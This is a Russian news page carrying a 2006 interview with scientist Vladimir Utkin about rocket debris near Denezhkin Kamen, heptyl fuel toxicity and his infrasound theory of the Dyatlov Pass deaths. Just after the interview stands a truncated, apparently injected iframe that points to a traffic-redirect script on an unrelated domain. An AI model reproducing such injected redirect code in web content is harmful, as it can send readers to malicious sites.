Член-корреспондент РАН Владимир Уткин: Обломки ракетных ступеней опасны, особенно если падают вам на голову

Политсовет, 06.02.2006. Член-корреспондент Российской академии наук, представитель Института геофизики Владимир Уткин рассказал ИА «Политсовет» о реальной степени опасности падающих обломков ракет на севере Свердловской области и о возможных причинах гибели «группы Дятлова»
— В последнее время подняли вопрос о падении отработанных ступеней ракет на севере области. Неужели это началось недавно?
— Отработанные части ступеней ракет начали падать на север свердловской области не вчера и даже не позавчера. Запуски спутников военного назначения с космодрома Плесецк идут уже около 40 лет. Все это время в определенную зону у нас в регионе сбрасываются обломки. Пик уже прошел, он был где-то в 80-х – в начале 90-хгодов прошлого века, когда с Плесецка активно выводили на орбиту гражданские спутники. Потом, после распада СССР, количество запусков резко пошло на убыль. Поднятый сейчас шум я бы назвал запоздалой суетой.
—Почему именно сейчас стали об этом говорить?
Просто сняли секретность с информации о падении этих обломков. Раньше все это было государственной тайной, а теперь люди узнали. Еще раз скажу — общее количество этих обломков меньше чем было раньше, падают они уже около 40 лет. Падают они (за исключением аварийных ситуаций) в достаточно ограниченную зону возле Денежкиного камня, примерно 15-20 километров в диаметре. Населения там практически нет, только туристы, геологи и так далее.
—Действительно ли эти обломки настолько опасны, как сейчас говорят?
Опасность, конечно есть — особенно. если обломок ступени ракеты упадет вам на голову. Это раскаленное металлическое тело, весом иногда до тонны. Вот это очень опасно. Кроме того, эти обломки содержат остатки гептила , который используется как ракетное топливо. Он токсичен и продукты его окисления обладают действием, сходным с нервно-паралитическим газом. Сам он может отравить, если попадет, к примеру, на руки, на кожу. Последствия зависят от дозы. Для того, чтобы получить смертельную дозу надо, скажем так, проявить определенную неосторожность.
Гептил окисляется атмосферным кислородом, причем скорость окисления зависит от температуры воздуха: чем она выше, тем быстрее окисление. Зимой, к примеру, это топливо сохраняется достаточно долго, летом разлагается быстрее.
—Эти обломки радиоактивны?
Нет, каких-то мощных источников радиоактивности — мощнее, чем , скажем, светящиеся часы — там просто не может быть по технологии. Они там не нужны. Опасность в этом случае чисто химическая.
—Как предостеречь от этой опасности?
Как я уже говорил, падение отработанных ступеней происходит в очень ограниченной зоне. На мой взгляд, стоит предупреждать тех людей: туристов, геологов и других — которые могут в ней оказаться о днях запусков, закрывать доступ людей на опасную территорию. Так делается, к примеру, при запусках баллистических ракет, когда предупреждают: будут производиться пуски в определенную зону, соответственно, просьба там не находиться.
— И последний вопрос: трагедия группы Дятлова не может быть следствием падения обломков ступеней ракет из Плесецка?
Думаю, здесь дело в другом. В те годы на Северном Урале, как я слышал, проводились испытания наших крылатых ракет. Рельеф этой местности как раз очень подходит для этих тестов — крылатая ракета должна лететь низко, огибая неровности местности. При этом ракета издает звуки сверхнизкой частоты — так называемый инфразвук. Он крайне плохо воздействует на психику живых существ, в том числе и людей, вызывая панику. Одна из версий таков, что люди, охваченные паникой, разбежались — а как раз была метель, они просто не смогли найти дорогу назад.
<iframe src="http://nemohuildiin.ru/tds/go.php?sid

Нажмите для вставки кода в блог
Распечатать

Архив Новостей

«    Декабрь 2019    »
ПнВтСрЧтПтСбВс
 1
2345678
9101112131415
16171819202122
23242526272829
3031 

Контакты